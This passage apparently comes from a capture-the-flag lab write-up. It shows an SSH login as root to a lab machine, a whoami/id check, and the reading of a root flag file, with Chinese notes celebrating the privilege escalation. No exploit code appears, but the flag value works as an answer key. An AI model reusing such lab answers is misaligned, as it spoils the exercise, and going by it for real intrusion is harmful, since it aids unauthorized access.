ECDSA key fingerprint is SHA256:2jPT4mThqEcnA/qjjQsIWwy2QNwGObWQX5MjK5YNvCM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.146' (ECDSA) to the list of known hosts.
root@10.10.11.146's password: 
Last login: Fri Feb 25 12:56:49 2022 from 10.10.14.76
root@production:~# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)

成功提权到root

root@production:~# ls
root.txt
root@production:~# cat root.txt 
4a243e1e3ccb05dbcd7a29abb49d3bcf

成功拿到root的flag文件